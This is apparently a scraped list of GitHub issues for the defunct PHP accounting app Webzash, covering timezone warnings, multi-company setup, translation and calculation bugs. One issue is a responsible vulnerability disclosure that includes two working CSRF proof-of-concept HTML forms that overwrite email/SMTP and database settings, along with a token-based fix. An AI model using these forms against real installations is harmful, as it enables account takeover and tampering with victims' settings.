prashants / webzash-v1-defunct Goto Github PK

I have copied the package from GITHUB and while using i am getting this error, kindly support what to do.Thanks in advance.

A PHP Error was encountered

Severity: Warning

Message: mktime(): It is not safe to rely on the system's timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Moscow' for '3.0/no DST' instead

Filename: helpers/date_helper.php

Line Number: 487

A PHP Error was encountered

Severity: Warning

Message: date(): It is not safe to rely on the system's timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Moscow' for '3.0/no DST' instead

Filename: helpers/MY_date_helper.php

Line Number: 101

I recently installed Webzash.

I am unable to change the company i am working on.

I am able to create new account using :-
Administer->Create Account->

The account is also created. When i select the particular account, its name alone changes but the transactions remain the same.

My requirement is I want Company 1 & Company 2 to work on.

Do i have to create a seperate database for every company i wish to create?

Kindly reply

.htaccess is not supported natively on IIS. It uses web.config to do the same things. Syntax for web.config is XML based. It will be good, if this file is added to all directories containing .htaccess.

error message, holding up progress.

Dear All,
Assets
|_ Fixed Assets
|_Machinery and Equipment Ledger Account Dr 21474836.48 Cr 21474836.48

I have problem when I enter the value more than Dr 21474326.48 then Cr will be come change to un-balance on Cr Value.

Please help me.
thank you

i am a fresher in this.
when i create a new account this error shows.

Hai, brother,
You are appreciated for this good work , god bless you
I check this program , and i cant find these simple report

1- Not available month vise report of any transaction report ,
2 - Not available a specif period report
3 Not available daily transaction report
please add this also
sidheeq T

I want to view Report By Date ( I Want to ad search by date system on report view page )
its just for Balance sheet OR for All Don't Matter
so please tel me How i can manage this on balancesheet.php page or another pages

NEW TO WEBZASH
KINDLY HELP ME IN STARTING THE WEBZASH

I received one more error.

A PHP Error was encountered

Severity: Warning

Message: date(): It is not safe to rely on the system's timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Moscow' for '3.0/no DST' instead

Filename: helpers/MY_date_helper.php

Line Number: 125

A PHP Error was encountered

Severity: Warning

Message: date(): It is not safe to rely on the system's timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Moscow' for '3.0/no DST' instead

Filename: helpers/MY_date_helper.php

Line Number: 137

Do i require to do the same before these lines ?

I notice there hasn't been much activity in the last year. Is this project still running?

Hello,

I want to add description for each row on adding entry.
Would you mind help me how we can do it?

Hello,
i want to use single db for all the accounts, means if i create 2 accounts in webzash
that must should use only single database, as currently each new account ask for the new database, kindly suggest

Hi
Im translating webzash to Persian
i have problem in translating the name of account in account page like Fixed Assets and...
please tell me which file of coding file is include the name of them?

Hi Webzash Team,

I am part of Codevigilant Team (http://www.codevigilant.com/), We are contacting you to disclose about multiple Security vulnerabilities in your software.

Vulnerability Class : Cross Site Request Forgery : https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Effect of Vulnerability (PoC) :

I tested all the forms and submissions you are not using CSRF token and by using this attacker can change Email, Password & Database, Payments and all other things.

POC ( Proof of Concept ):

<html>
  <body>
    <form action="http://localhost/index.php/setting/email" method="POST">
      <input type="hidden" name="email&#95;protocol" value="smtp" />
      <input type="hidden" name="email&#95;host" value="mail&#46;localhost&#46;com" />
      <input type="hidden" name="email&#95;port" value="465" />
      <input type="hidden" name="email&#95;username" value="test&#64;localhost&#46;com" />
      <input type="hidden" name="email&#95;password" value="password" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

In the above form if i change the password and email and send to admin then I can take over the account.

<html>
  <body>
    <form action="http://localhost/index.php/setting/cf" method="POST">
      <input type="hidden" name="account&#95;label" value="" />
      <input type="hidden" name="account&#95;name" value="test" />
      <input type="hidden" name="fy&#95;start" value="2014&#47;01&#47;01" />
      <input type="hidden" name="fy&#95;end" value="2014&#47;03&#47;11" />
      <input type="hidden" name="create&#95;database" value="1" />
      <input type="hidden" name="database&#95;name" value="test" />
      <input type="hidden" name="database&#95;username" value="test" />
      <input type="hidden" name="database&#95;password" value="test" />
      <input type="hidden" name="database&#95;host" value="localhost" />
      <input type="hidden" name="database&#95;port" value="3306" />
      <input type="hidden" name="submit" value="Carrfy&#32;forward" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

In the above form we can change all the database settings and others.

I am just putting these two, Actually all forms and payment settings and everything is vulnerable to CSRF attacks.

Recommendations :

Please use a CSRF token and generate it random for each request you are making and validate that token is server side as well. For more reference please check the following link
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

Thanks & Regards,
Madhu Akula
Code Vigilant

Ref: Invalid account database. Table "settings" missing.

NewLion:
I looked up (line 77 in) system/application/controllers/user.php. Since [account_name] is already stored in [user].ini, what is the easiest way to auto activate this [account] after log on? Basically, I want users with only one account to skip the Activate step as this is redundant and instead load their dashboard.

prashants:
after line 77 once the user is auth, get the user details from line 140. this will give you the account name in $active_user['accounts'] in string, convert to array in 150. if one element then line 180 to load the account. set session in 187 and then redirect to home page.
much more simple hack :
just add one line after line no. 77 where 'sample' is the account label. thats it.
$this->session->set_userdata('active_account', 'sample');

Everything is working fine now, except, I am still seeing from time to time "Invalid Entry type specified. Showing all Entries." error message when listing or creating a new entry. It is more visible for payment and contra, but not yet able to figure a pattern.

Hi
Im translating webzash to Persian
i have problem in translating the name of account in account page like Fixed Assets and...
please tell me which file of coding file is include the name of them?

There seem to be a problem with calculations. Here's a test Trial Balance

Ledger Account  O/P Balance     C/L Balance     Dr Total    Cr Total
Cash/Asset      Dr 30000.00     Dr 30000.00     0           0
Some Loan       Cr 2060.00      Dr 2060.00      0           0
Direct Expense1 Dr 5000.00      Dr 5000.00      0           0
Direct Income1  Cr 25000.00     Dr 25000.00     0           0

Correct if I'm wrong, but without any transactions, shouldn't closing (C/L) balances for Loan and Income1 be a Cr balance ?

Similarly, P&L is showing Net Loss of 30000 when it should be (Income - Expense = 25000 - 5000) Net Profit of 20000.

Hi, I was able to transalate to Spanish almost 99% using your instractions for translation. However, I can not find a way to show the spanish month names, for example:

Jan = ENERO
Feb = Febrero
etc...
This is a great program, thank for your help.

Hi admin,

I had no problem installing and logging in as admin/admin. When I tried to activate sample, I get the following error:

Invalid account database. Table "settings" missing.

Also, when I try to Create Account, I get several warnings on date() and time() functions as follows:

A PHP Error was encountered
Severity: Warning
Message: date(): It is not safe to rely on the system's timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'UTC' for '6.0/no DST' instead
Filename: admin/create.php
Line Number: 28

I can however, create/manage users and also create/manage accounts.

Thanks a lot for all your help.

When I enter an amount of 100000000(Ten crore/100 million) in 32 bit platform that creates problems.. When I comment these lines
$param1 = $param1 * 100;
$param2 = $param2 * 100; (line 210)
on the function 'float_ops' under 'custom_helper.php' in 'helpers', then it works smooth.

When I upload on server there is no problem. .So I searched on google, says that its because of PHP int declaration. Actually why we convert these float values to int. whats the purpose behind it?